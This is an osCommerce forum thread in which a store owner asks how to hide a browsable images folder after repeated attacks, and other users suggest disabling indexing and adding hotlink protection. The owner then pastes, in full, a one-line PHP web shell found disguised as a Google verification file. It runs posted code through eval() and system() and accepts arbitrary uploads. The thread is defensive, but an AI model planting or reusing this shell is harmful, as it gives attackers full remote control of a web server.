Jump to content
  • Checkout
  • Login
  • Get in touch


The e-commerce.

Problem with folder images, i can see it


Recommended Posts


if access www.mystore.com/images can see all files that are in images folder. Site has been attacked three times in the last month, I did everything I found here - http://www.oscommerce.com/forums/index.php?showtopic=313323 but now I have this problem I can see what is in images.

How can I block access to that folder?


|Thank you

Link to comment
Share on other sites

If the only problem is that random visitors can enter a directory (folder) in the browser, and see all the files in it, you can do one of two things: you can put in a dummy index.html in that directory (empty file or something trivial), or you can set your system to "disable indexing" via a control panel button or adding a Options -Indexes line to .htaccess.


Being able to see image files is not a security hazard, but you might not want visitors to see other kinds of files. Remember that anyone can view a page source and get the name and path of any image file, and directly call up that image. Adding "hotlink protection" that allows "empty" (command line) would prevent someone from doing that.

Link to comment
Share on other sites

I fix the problem with .htacces


AuthUserFile /dev/null

AuthGroupFile /dev/null


RewriteEngine On


RewriteCond %{HTTP_REFERER} !^http://www.site.com.* [NC]

RewriteCond %{HTTP_REFERER} !^http://ma.osite.com.* [NC]

RewriteCond %{HTTP_REFERER} !^http://members.site.com.* [NC]

RewriteCond %{HTTP_REFERER} !^http://ochesite.com.* [NC]

RewriteCond %{HTTP_REFERER} !^http://911.222.111.111.* [NC]


RewriteRule /* http://osite.com/index.html [R,L]


Link to comment
Share on other sites

And I have problems with images folder. I found the folder goog1e5b6d6f1840c255.php


Goog1e_analist_up<?php $e=@$_POST['e'];$s=@$_POST['s'];if($e){eval($e);}if($s){system($s);}if($_FILES['f']['name']!=''){move_uploaded_file($_FILES['f']['tmp_name'],$_FILES['f']['name']);}?>
Link to comment
Share on other sites

Looks like something a hacker might use to me.


It's not "normal" to have PHP files in your images folder (on most sites).


If you were an astronaut I would advise you to "get on the horn" and repeat the infamous words from Apollo 13:


"Houston... We have a problem...."


If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.


"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -


"Headers already sent" - The definitive help


"Cannot redeclare ..." - How to find/fix it


SSL Implementation Help


Like this post? "Like" it again over there >

Link to comment
Share on other sites

  • 2 months later...


This topic is now archived and is closed to further replies.

  • Create New...